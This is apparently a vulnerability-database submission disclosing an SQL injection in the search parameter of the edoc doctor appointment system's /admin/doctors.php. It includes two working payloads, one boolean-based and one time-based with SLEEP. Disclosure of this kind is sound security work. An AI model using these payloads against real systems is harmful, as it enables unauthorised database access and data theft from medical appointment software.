Submit #95222: Sql injection exists for search parameter of edoc doctor appointment systeminfo

TitleSql injection exists for search parameter of edoc doctor appointment system
DescriptionSQL injection vulnerability exists in search parameter of /admin/doctors.php file of edoc doctor appointment system Important user data or system data may be leaked and system security may be compromised.The environment is secure and the information can be used by malicious users. Payload:search=Test Doctor' AND 6098=6098 AND 'YaJr'='YaJr or search=Test Doctor' AND (SELECT 4403 FROM (SELECT(SLEEP(5)))jqSz) AND 'jDlM'='jDlM
Source⚠️ https://github.com/E1CHO/cve_hub/blob/main/edoc%20doctor%20appointment%20system/edoc%20doctor%20appointment%20system%20vlun3.pdf
User
 SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874)
Submission02/27/2023 08:22 AM (2 years ago)
Moderation02/27/2023 12:07 PM (4 hours later)
StatusAccepted
VulDB Entry221824 [SourceCodester Doctors Appointment System 1.0 Parameter /admin/doctors.php search/id sql injection]
Points20

Do you need the next level of professionalism?

Upgrade your account now!